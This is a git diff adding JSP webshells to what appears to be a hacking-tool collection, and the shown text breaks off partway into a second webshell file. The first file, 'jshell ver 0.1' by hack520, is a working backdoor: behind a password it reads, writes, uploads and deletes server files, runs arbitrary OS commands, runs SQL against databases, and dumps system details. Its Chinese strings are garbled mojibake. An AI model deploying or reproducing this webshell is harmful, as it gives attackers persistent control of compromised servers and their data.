+public String listFiles(String path, String curUri) { +File[] files = null; +File curFile = null; +String sRet = null; +int n = 0; +boolean isRoot = path.equals(""); + +path = pathConvert(path); + +try { +if (isRoot) { +files = File.listRoots(); +} else { +try { +curFile = new File(path); +String[] sFiles = curFile.list(); +files = new File[sFiles.length]; + +for (n = 0; n < sFiles.length; n ++) { +files[n] = new File(path + sFiles[n]); +} +} catch (Exception e) { +sRet = "bad path \"" + path + "\""; +} +} + +if (sRet == null) { +sRet = "\n"; +sRet += "\n"; +sRet += "\n"; +sRet += " \n"; + +if (curFile != null) { +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +} + +sRet += "\n"; + +sRet += " \n"; + +for (n = 0; n < files.length; n ++) { +sRet += " \n"; + +if (! isRoot) { +sRet += " \n"; +if (files[n].isDirectory()) { +sRet += " \n"; +} else { +sRet += " \n"; +} + +sRet += " \n"; +sRet += " \n"; +} else { +sRet += " \n"; +} + +sRet += " \n"; +} +sRet += " \n"; +sRet += "
    \n"; +sRet += "  ϼĿ¼ "; +sRet += "Ŀ¼ "; +sRet += "½ļ "; +sRet += "ɾ "; +sRet += " "; +sRet += " "; +sRet += "ϴļ\n"; +sRet += " \n"; +sRet += "
    <" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
    \n"; +} +} catch (SecurityException e) { +sRet = "security violation, no privilege."; +} + +return sRet; +} + +public boolean isTextFile(String extName) { +int i; +boolean bRet = false; + +if (! extName.equals("")) { +for (i = 0; i < _textFileTypes.length; i ++) { +if (extName.equals(_textFileTypes[i])) { +bRet = true; +break; +} +} +} else { +bRet = true; +} + +return bRet; +} + +public String getExtName(String fileName) { +String sRet = ""; +int nLastDotPos; + +fileName = pathConvert(fileName); + +nLastDotPos = fileName.lastIndexOf("."); + +if (nLastDotPos == -1) { +sRet = ""; +} else { +sRet = fileName.substring(nLastDotPos + 1); +} + +return sRet; +} + +public String browseFile(String path) { +String sRet = ""; +File file = null; +FileReader fileReader = null; + +path = pathConvert(path); + +try { +file = new File(path); +fileReader = new FileReader(file); +String fileString = ""; +char[] chBuffer = new char[1024]; +int ret; + +sRet = "\n"; + +} catch (IOException e) { +sRet += "\n"; +} + +return sRet; +} + +public String openFile(String path, String curUri) { +String sRet = ""; +boolean canOpen = false; +int nLastDotPos = path.lastIndexOf("."); +String extName = ""; +String fileString = null; +File curFile = null; + +path = pathConvert(path); + +if (nLastDotPos == -1) { +canOpen = true; +} else { +extName = path.substring(nLastDotPos + 1); +canOpen = isTextFile(extName); +} + +if (canOpen) { +try { +fileString = ""; +curFile = new File(path); +FileReader fileReader = new FileReader(curFile); +char[] chBuffer = new char[1024]; +int nRet; + +while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { +fileString += new String(chBuffer, 0, nRet); +} + +fileReader.close(); +} catch (IOException e) { +fileString = null; +sRet = "ܴļ\"" + path + "\""; +} catch (SecurityException e) { +fileString = null; +sRet = "ȫ⣬ûȨִиò"; +} +} else { +sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; +} + +if (fileString != null) { +sRet += "\n"; +sRet += "\n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += "
    [ϼĿ¼]
    \n"; +sRet += " \n"; +sRet += "
     
    \n"; +} + +return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { +String sRet = ""; +File file = null; + +path = pathConvert(path); + +try { +file = new File(path); + +if (! file.canWrite()) { +sRet = "ļд"; +} else { +FileWriter fileWriter = new FileWriter(file); +fileWriter.write(fileContent); + +fileWriter.close(); +sRet = "ļɹڷأԺ򡭡\n"; +sRet += "\n"; +} +} catch (IOException e) { +sRet = "ļʧ"; +} catch (SecurityException e) { +sRet = "ȫ⣬ûȨִиò"; +} + +return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { +String sRet = ""; +File folder = null; + +path = pathConvert(path); + +try { +folder = new File(path + folderName); + +if (folder.exists() && folder.isDirectory()) { +sRet = "\"" + path + folderName + "\"Ŀ¼Ѿ"; +} else { +if (folder.mkdir()) { +sRet = "ɹĿ¼\"" + pathConvert(folder.getPath()) + "\"ڷأԺ򡭡\n"; +sRet += ""; +} else { +sRet = "Ŀ¼\"" + folderName + "\"ʧ"; +} +} +} catch (SecurityException e) { +sRet = "ȫ⣬ûȨִиò"; +} + +return sRet; +} + +public String createFile(String path, String curUri, String fileName) { +String sRet = ""; +File file = null; + +path = pathConvert(path); + +try { +file = new File(path + fileName); + +if (file.createNewFile()) { +sRet = ""; +} else { +sRet = "\"" + path + fileName + "\"ļѾ"; +} +} catch (SecurityException e) { +sRet = "ȫ⣬ûȨִиò"; +} catch (IOException e) { +sRet = "ļ\"" + path + fileName + "\"ʧ"; +} + +return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { +String sRet = ""; +File tmpFile = null; + +try { +for (int i = 0; i < files2Delete.length; i ++) { +tmpFile = new File(files2Delete[i]); +if (! tmpFile.delete()) { +sRet += "ɾ\"" + files2Delete[i] + "\"ʧ
    \n"; +} +} + +if (sRet.equals("")) { +sRet = "ɾɹڷأԺ򡭡\n"; +sRet += ""; +} +} catch (SecurityException e) { +sRet = "ȫ⣬ûȨִиò\n"; +} + +return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { +String sRet = ""; +File file = null; +FileWriter fileWriter = null; + +try { +file = new File(path); + +if (file.createNewFile()) { +fileWriter = new FileWriter(file); +fileWriter.write(fileContent); +fileWriter.close(); + +sRet = ""; +} else { +sRet = "ļ\"" + path + "\"Ѿ"; +} +} catch (IOException e) { +sRet = "ļ\"" + path + "\"ʧ"; +} + +return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { +String sRet = ""; +File file = null; +InputStream in = null; + +path = pathConvert(path); + +try { +in = request.getInputStream(); + +byte[] inBytes = new byte[request.getContentLength()]; +int nBytes; +int start = 0; +int end = 0; +int size = 1024; +String token = null; +String filePath = null; + +// +// һֽ +// +while ((nBytes = in.read(inBytes, start, size)) != -1) { +start += nBytes; +} + +in.close(); +// +// ֽеõļָ +// +int i = 0; +byte[] seperator; + +while (inBytes[i] != 13) { +i ++; +} + +seperator = new byte[i]; + +for (i = 0; i < seperator.length; i ++) { +seperator[i] = inBytes[i]; +} + +// +// õHeader +// +String dataHeader = null; +i += 3; +start = i; +while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { +i ++; +} +end = i - 1; +dataHeader = new String(inBytes, start, end - start + 1); + +// +// õļ +// +token = "filename=\""; +start = dataHeader.indexOf(token) + token.length(); +token = "\""; +end = dataHeader.indexOf(token, start) - 1; +filePath = dataHeader.substring(start, end + 1); +filePath = pathConvert(filePath); +String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + +// +// õļݿʼλ +// +i += 4; +start = i; + +/* +boolean found = true; +byte[] tmp = new byte[seperator.length]; +while (i <= inBytes.length - 1 - seperator.length) { + +for (int j = i; j < i + seperator.length; j ++) { +if (seperator[j - i] != inBytes[j]) { +found = false; +break; +} else +tmp[j - i] = inBytes[j]; +} + +if (found) +break; + +i ++; +}*/ + +// +// ͵İ취 +// +end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + +// +// Ϊļ +// +File newFile = new File(path + fileName); +newFile.createNewFile(); +FileOutputStream out = new FileOutputStream(newFile); + +//out.write(inBytes, start, end - start + 1); +out.write(inBytes, start, end - start + 1); +out.close(); + +sRet = "\n"; +} catch (IOException e) { +sRet = "\n"; +} + +sRet += ""; +return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { +boolean bRet = true; + +try { +FileInputStream in = new FileInputStream(new File(srcPath)); +FileOutputStream out = new FileOutputStream(new File(dstPath)); +byte[] buffer = new byte[1024]; +int nBytes; + + +while ((nBytes = in.read(buffer, 0, 1024)) != -1) { +out.write(buffer, 0, nBytes); +} + +in.close(); +out.close(); +} catch (IOException e) { +bRet = false; +} + +return bRet; +} + +public String getFileNameByPath(String path) { +String sRet = ""; + +path = pathConvert(path); + +if (path.lastIndexOf("/") != -1) { +sRet = path.substring(path.lastIndexOf("/") + 1); +} else { +sRet = path; +} + +return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { +String sRet = ""; +int i; + +path = pathConvert(path); +dstPath = pathConvert(dstPath); + +for (i = 0; i < files2Copy.length; i ++) { +if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { +sRet += "ļ\"" + files2Copy[i] + "\"ʧ
    "; +} +} + +if (sRet.equals("")) { +sRet = "ļƳɹڷأԺ򡭡"; +sRet += ""; +} + +return sRet; +} + +public boolean isFileName(String fileName) { +boolean bRet = false; + +Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); +Matcher m = p.matcher(fileName); + +bRet = m.matches(); + +return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { +String sRet = ""; + +path = pathConvert(path); +file2Rename = pathConvert(file2Rename); + +try { +File file = new File(file2Rename); + +newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; +File newFile = new File(newName); + +if (! file.exists()) { +sRet = "ļ\"" + file2Rename + "\""; +} else { +file.renameTo(newFile); +sRet = "ļɹڷأԺ򡭡"; +sRet += ""; +} +} catch (SecurityException e) { +sRet = "ȫ⵼ļ\"" + file2Rename + "\"ʧ"; +} + +return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { +boolean bRet = true; +String driverName = ""; + +if (dbServer.equals("")) +dbServer = "localhost"; + +try { +if (dbType.equals("sqlserver")) { +driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; +if (dbPort.equals("")) +dbPort = "1433"; +_url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; +} else if (dbType.equals("mysql")) { +driverName = "com.mysql.jdbc.Driver"; +if (dbPort.equals("")) +dbPort = "3306"; +_url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; +} else if (dbType.equals("odbc")) { +driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; +_url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; +} else if (dbType.equals("oracle")) { +driverName = "oracle.jdbc.driver.OracleDriver"; +_url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; +} else if (dbType.equals("db2")) { +driverName = "com.ibm.db2.jdbc.app.DB2Driver"; +_url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; +} + +Class.forName(driverName); +} catch (ClassNotFoundException e) { +bRet = false; +} + +return bRet; +} + +public boolean DBConnect(String User, String Password) { +boolean bRet = false; + +if (_url != null) { +try { +_dbConnection = DriverManager.getConnection(_url, User, Password); +_dbStatement = _dbConnection.createStatement(); +bRet = true; +} catch (SQLException e) { +bRet = false; +} +} + +return bRet; +} + +public String DBExecute(String sql) { +String sRet = ""; + +if (_dbConnection == null || _dbStatement == null) { +sRet = "ݿû"; +} else { +try { +if (sql.toLowerCase().substring(0, 6).equals("select")) { +ResultSet rs = _dbStatement.executeQuery(sql); +ResultSetMetaData rsmd = rs.getMetaData(); +int colNum = rsmd.getColumnCount(); +int colType; + +sRet = "sqlִгɹؽ
    \n"; +sRet += "\n"; +sRet += " \n"; +for (int i = 1; i <= colNum; i ++) { +sRet += " \n"; +} +sRet += " \n"; +while (rs.next()) { +sRet += " \n"; +for (int i = 1; i <= colNum; i ++) { +colType = rsmd.getColumnType(i); + +sRet += " \n"; +} +sRet += " \n"; +} +sRet += "
    " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
    "; +switch (colType) { +case Types.BIGINT: +sRet += rs.getLong(i); +break; + +case Types.BIT: +sRet += rs.getBoolean(i); +break; + +case Types.BOOLEAN: +sRet += rs.getBoolean(i); +break; + +case Types.CHAR: +sRet += rs.getString(i); +break; + +case Types.DATE: +sRet += rs.getDate(i).toString(); +break; + +case Types.DECIMAL: +sRet += rs.getDouble(i); +break; + +case Types.NUMERIC: +sRet += rs.getDouble(i); +break; + +case Types.REAL: +sRet += rs.getDouble(i); +break; + +case Types.DOUBLE: +sRet += rs.getDouble(i); +break; + +case Types.FLOAT: +sRet += rs.getFloat(i); +break; + +case Types.INTEGER: +sRet += rs.getInt(i); +break; + +case Types.TINYINT: +sRet += rs.getShort(i); +break; + +case Types.VARCHAR: +sRet += rs.getString(i); +break; + +case Types.TIME: +sRet += rs.getTime(i).toString(); +break; + +case Types.DATALINK: +sRet += rs.getTimestamp(i).toString(); +break; +} +sRet += "
    \n"; + +rs.close(); +} else { +if (_dbStatement.execute(sql)) { +sRet = "sqlִгɹ"; +} else { +sRet = "sqlִʧ"; +} +} +} catch (SQLException e) { +sRet = "sqlִʧ"; +} +} + +return sRet; +} + +public void DBRelease() { +try { +if (_dbStatement != null) { +_dbStatement.close(); +_dbStatement = null; +} + +if (_dbConnection != null) { +_dbConnection.close(); +_dbConnection = null; +} +} catch (SQLException e) { + +} +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { +private String _jshellContent = null; +private String _path = null; + +public JshellConfig(String path) throws JshellConfigException { +_path = path; +read(); +} + +private void read() throws JshellConfigException { +try { +FileReader jshell = new FileReader(new File(_path)); +char[] buffer = new char[1024]; +int nChars; +_jshellContent = ""; + +while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { +_jshellContent += new String(buffer, 0, nChars); +} + +jshell.close(); +} catch (IOException e) { +throw new JshellConfigException("ļʧ"); +} +} + +public void save() throws JshellConfigException { +FileWriter jshell = null; + +try { +jshell = new FileWriter(new File(_path)); +char[] buffer = _jshellContent.toCharArray(); +int start = 0; +int size = 1024; + +for (start = 0; start < buffer.length - 1 - size; start += size) { +jshell.write(buffer, start, size); +} + +jshell.write(buffer, start, buffer.length - 1 - start); +} catch (IOException e) { +new JshellConfigException("дļʧ"); +} finally { +try { +jshell.close(); +} catch (IOException e) { + +} +} +} + +public void setPassword(String password) throws JshellConfigException { +Pattern p = Pattern.compile("\\w+"); +Matcher m = p.matcher(password); + +if (! m.matches()) { +throw new JshellConfigException("벻гĸ»ַ"); +} + +p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); +m = p.matcher(_jshellContent); +if (! m.find()) { +throw new JshellConfigException("ѾǷ޸"); +} + +_jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + +//return HTMLEncode(_jshellContent); +} + +public void setEncodeType(String encodeType) throws JshellConfigException { +Pattern p = Pattern.compile("[A-Za-z0-9]+"); +Matcher m = p.matcher(encodeType); + +if (! m.matches()) { +throw new JshellConfigException("ʽֻĸֵ"); +} + +p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); +m = p.matcher(_jshellContent); + +if (! m.find()) { +throw new JshellConfigException("ѾǷ޸"); +} + +_jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); +//return HTMLEncode(_jshellContent); +} + +public void setSessionTime(String sessionTime) throws JshellConfigException { +Pattern p = Pattern.compile("\\d+"); +Matcher m = p.matcher(sessionTime); + +if (! m.matches()) { +throw new JshellConfigException("sessionʱʱֻ"); +} + +p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); +m = p.matcher(_jshellContent); + +if (! m.find()) { +throw new JshellConfigException("ѾǷ޸"); +} + +_jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); +//return HTMLEncode(_jshellContent); +} + +public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { +Pattern p = Pattern.compile("\\w+"); +Matcher m = null; +int i; +String fileTypes = ""; +String tmpFileTypes = ""; + +for (i = 0; i < textFileTypes.length; i ++) { +m = p.matcher(textFileTypes[i]); + +if (! m.matches()) { +throw new JshellConfigException("չֻĸֺ»ߵ"); +} + +if (i != textFileTypes.length - 1) +fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; +else +fileTypes += "\"" + textFileTypes[i] + "\""; +} + +for (i = 0; i < _textFileTypes.length; i ++) { +if (i != _textFileTypes.length - 1) +tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; +else +tmpFileTypes += "\"" + _textFileTypes[i] + "\""; +} + +p = Pattern.compile(tmpFileTypes); +m = p.matcher(_jshellContent); + +if (! m.find()) { +throw new JshellConfigException("ļѾǷ޸"); +} + +_jshellContent = m.replaceAll(fileTypes); + +//return HTMLEncode(_jshellContent); +} + +public String getContent() { +return HTMLEncode(_jshellContent); +} +} + +class JshellConfigException extends Exception { +public JshellConfigException(String message) { +super(message); +} +} +%> + + +[FCHK]Сר + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
    + + + + +
    + + + + + + + + + + + + + + + +
     8¼ :::...JFolder_By_hack520
    + + +
    +
    +<% +//================================================================================================ +// end of the login form +} else { +String password = null; + +if (session.getAttribute("password") == null) { +password = (String)request.getParameter("password"); + +if (validate(password) == false) { +out.println("
  • ѽù!
    • "); +out.close(); +return; +} + +session.setAttribute("password", password); +} else { +password = (String)session.getAttribute("password"); +} + +String action = null; + + +if (request.getParameter("action") == null) +action = "main"; +else +action = (String)request.getParameter("action"); + +if (action.equals("exit")) { +session.removeAttribute("password"); +response.sendRedirect(request.getRequestURI()); +out.close(); +return; +} + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + +if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Ϣ
    <%=request.getServerName()%>
    ˿<%=request.getServerPort()%>
    ϵͳ<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    ǰû<%=System.getProperty("user.name")%>
    ǰûĿ¼<%=System.getProperty("user.home")%>
    ǰûĿ¼<%=System.getProperty("user.dir")%>
    ·<%=request.getRequestURI()%>
    ·<%=request.getRealPath(request.getServletPath())%>
    Э<%=request.getProtocol()%>
    汾Ϣ<%=application.getServerInfo()%>
    JDK汾<%=System.getProperty("java.version")%>
    JDKװ·<%=System.getProperty("java.home")%>
    JAVA汾<%=System.getProperty("java.vm.specification.version")%>
    JAVA<%=System.getProperty("java.vm.name")%>
    JAVA·<%=System.getProperty("java.class.path")%>
    JAVA·<%=System.getProperty("java.library.path")%>
    JAVAʱĿ¼<%=System.getProperty("java.io.tmpdir")%>
    JIT<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    չĿ¼·<%=System.getProperty("java.ext.dirs")%>
    ͻϢ
    ͻַ<%=request.getRemoteAddr()%>
    <%=request.getRemoteHost()%>
    û<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    ʽ<%=request.getScheme()%>
    Ӧðȫ׽ֲ<%=request.isSecure() == true ? "" : ""%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("filesystem")) { +String curPath = ""; +String result = ""; +String fsAction = ""; + +if (request.getParameter("curPath") == null) { +curPath = request.getRealPath(request.getServletPath()); +curPath = pathConvert((new File(curPath)).getParent()); +} else { +curPath = Unicode2GB((String)request.getParameter("curPath")); +} + +if (request.getParameter("fsAction") == null) { +fsAction = "list"; +} else { +fsAction = (String)request.getParameter("fsAction"); +} + +if (fsAction.equals("list")) +result = listFiles(curPath, request.getRequestURI() + "?action=" + action); +else if (fsAction.equals("browse")) { +result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); +result += browseFile(curPath); +} +else if (fsAction.equals("open")) +result = openFile(curPath, request.getRequestURI() + "?action=" + action); +else if (fsAction.equals("save")) { +if (request.getParameter("fileContent") == null) { +result = "ҳ浼"; +} else { +String fileContent = Unicode2GB((String)request.getParameter("fileContent")); +result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); +} +} else if (fsAction.equals("createFolder")) { +if (request.getParameter("folderName") == null) { +result = "Ŀ¼Ϊ"; +} else { +String folderName = Unicode2GB(request.getParameter("folderName").trim()); +if (folderName.equals("")) { +result = "Ŀ¼Ϊ"; +} else { +result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); +} +} +} else if (fsAction.equals("createFile")) { +if (request.getParameter("fileName") == null) { +result = "ļΪ"; +} else { +String fileName = Unicode2GB(request.getParameter("fileName").trim()); +if (fileName.equals("")) { +result = "ļΪ"; +} else { +result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); +} +} +} else if (fsAction.equals("deleteFile")) { +if (request.getParameter("filesDelete") == null) { +result = "ûѡҪɾļ"; +} else { +String[] files2Delete = (String[])request.getParameterValues("filesDelete"); +if (files2Delete.length == 0) { +result = "ûѡҪɾļ"; +} else { +for (int n = 0; n < files2Delete.length; n ++) { +files2Delete[n] = Unicode2GB(files2Delete[n]); +} +result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); +} +} +} else if (fsAction.equals("saveAs")) { +if (request.getParameter("fileContent") == null) { +result = "ҳ浼"; +} else { +String fileContent = Unicode2GB(request.getParameter("fileContent")); +result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); +} +} else if (fsAction.equals("upload")) { +result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); +} else if (fsAction.equals("copyto")) { +if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { +result = "ûѡҪƵļ"; +} else { +String[] files2Copy = request.getParameterValues("filesDelete"); +String dstPath = request.getParameter("dstPath").trim(); +if (files2Copy.length == 0) { +result = "ûѡҪƵļ"; +} else if (dstPath.equals("")) { +result = "ûдҪƵĿ¼·"; +} else { +for (int i = 0; i < files2Copy.length; i ++) +files2Copy[i] = Unicode2GB(files2Copy[i]); + +result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); +} +} +} else if (fsAction.equals("rename")) { +if (request.getParameter("fileRename") == null) { +result = "ҳ浼"; +} else { +String file2Rename = request.getParameter("fileRename").trim(); +String newName = request.getParameter("newName").trim(); +if (file2Rename.equals("")) { +result = "ûѡҪļ"; +} else if (newName.equals("")) { +result = "ûдļ"; +} else { +result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); +} +} +} +%> + + + + + + + + + +
    ַ   +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("command")) { +String cmd = ""; +InputStream ins = null; +String result = ""; + +if (request.getParameter("command") != null) { +cmd = (String)request.getParameter("command"); +result = exeCmd(cmd); +} +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    ִ
    + + +
    ִн
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("database")) { +String dbAction = ""; +String result = ""; +String dbType = ""; +String dbServer = ""; +String dbPort = ""; +String dbUsername = ""; +String dbPassword = ""; +String dbName = ""; +String dbResult = ""; +String sql = ""; + +if (request.getParameter("dbAction") == null) { +dbAction = "main"; +} else { +dbAction = request.getParameter("dbAction").trim(); +if (dbAction.equals("")) +dbAction = "main"; +} + +if (dbAction.equals("main")) { +result = " "; +} else if (dbAction.equals("dbConnect")) { +if (request.getParameter("dbType") == null || +request.getParameter("dbServer") == null || +request.getParameter("dbPort") == null || +request.getParameter("dbUsername") == null || +request.getParameter("dbPassword") == null || +request.getParameter("dbName") == null) { +response.sendRedirect(request.getRequestURI() + "?action=" + action); +} else { +dbType = request.getParameter("dbType").trim(); +dbServer = request.getParameter("dbServer").trim(); +dbPort = request.getParameter("dbPort").trim(); +dbUsername = request.getParameter("dbUsername").trim(); +dbPassword = request.getParameter("dbPassword").trim(); +dbName = request.getParameter("dbName").trim(); + +if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { +if (DBConnect(dbUsername, dbPassword)) { +if (request.getParameter("sql") != null) { +sql = request.getParameter("sql").trim(); +if (! sql.equals("")) { +dbResult = DBExecute(sql); +} +} + +result = "\n"; +result += "sql

     \n"; + +DBRelease(); +} else { +result = "ݿʧ"; +} +} else { +result = "ݿûҵ"; +} +} +} +%> + + +"> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    ݿ + + +
    ݿַ
    ݿ˿
    ݿû
    ݿ
    ݿ
     
    <%=result%>
    + + + + +
    +<%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("config")) { +String cfAction = ""; +int i; + +if (request.getParameter("cfAction") == null) { + +cfAction = "main"; +} else { +cfAction = request.getParameter("cfAction").trim(); +if (cfAction.equals("")) +cfAction = "main"; +} + +if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + +" onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    ϵͳ
    Sessionʱʱ
    ɱ༭ļ + + + + + + +
    + + + +

    + +    		 + +
    +
    +<% +} else if (cfAction.equals("save")) { +if (request.getParameter("password") == null || +request.getParameter("encode") == null || +request.getParameter("sessionTime") == null || +request.getParameterValues("textFileTypes") == null) { +response.sendRedirect(request.getRequestURI()); +} + +String result = ""; + +String newPassword = request.getParameter("password").trim(); +String newEncodeType = request.getParameter("encode").trim(); +String newSessionTime = request.getParameter("sessionTime").trim(); +String[] newTextFileTypes = request.getParameterValues("textFileTypes"); +String jshellPath = request.getRealPath(request.getServletPath()); + +try { +JshellConfig jconfig = new JshellConfig(jshellPath); +jconfig.setPassword(newPassword); +jconfig.setEncodeType(newEncodeType); +jconfig.setSessionTime(newSessionTime); +jconfig.setTextFileTypes(newTextFileTypes); +jconfig.save(); +result += "ñɹڷأԺ򡭡"; +result += ""; +} catch (JshellConfigException e) { +result = "" + e.getMessage() + ""; +} + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% +} +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form +} else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    jshell ver 0.1
        ʾalxeaĹܣҲȽϷЩȨǹߵ.
    hack520 by hack520 and welcome to FCHK
    +<% +//========================================================================================== +} +} +%> + + diff --git a/jsp/hackk8/fuck-jsp/ma2.jsp b/jsp/hackk8/fuck-jsp/ma2.jsp new file mode 100644 index 0000000..c2b506a --- /dev/null +++ b/jsp/hackk8/fuck-jsp/ma2.jsp @@ -0,0 +1,807 @@ +<%@ page import="java.util.*,java.net.*,java.text.*,java.util.zip.*,java.io.*"%> +<%@ page contentType="text/html;charset=gb2312"%> +<%! +/* +************************************************************************************** +*JSP ļ v1.001 * +*Copyright (C) 2003 by Bagheera * +*E-mail:bagheera@beareyes.com * +*QQ:179189585 * +*http://jmmm.com * +*------------------------------------------------------------------------------------* +*:벻Ҫ޸ϰȨϢ! * +************************************************************************************** +*#######ѿռϵͳ֮У뵽Բ: * +**http://jmmm.com/web/index.jsp ʺ:test :test * +************************************************************************************** +*/ + +//༭ʾ +private static final int EDITFIELD_COLS =100; +//༭ʾ +private static final int EDITFIELD_ROWS = 30; +//----------------------------------------------------------------------------- + +//ıϴļǵĻĿ¼(һ㲻Ҫ޸) +private static String tempdir = "."; + +public class FileInfo{ + public String name = null, + clientFileName = null, + fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + public void setFileContents(byte[] aByteArray){ + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } +} + +public class HttpMultiPartParser{ + private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB=1024*1024*1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir) + throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) + throw new IllegalArgumentException("boundary"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles=(saveInDir != null && saveInDir.trim().length() > 0), + isFile = false; + if (saveFiles){ + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) + throw new IOException("δ;" + +" boundary = " + boundary + +", line = " + line); + while (line != null){ + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException("ִ!"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException("ִ!"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException("ִ!"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()){ + 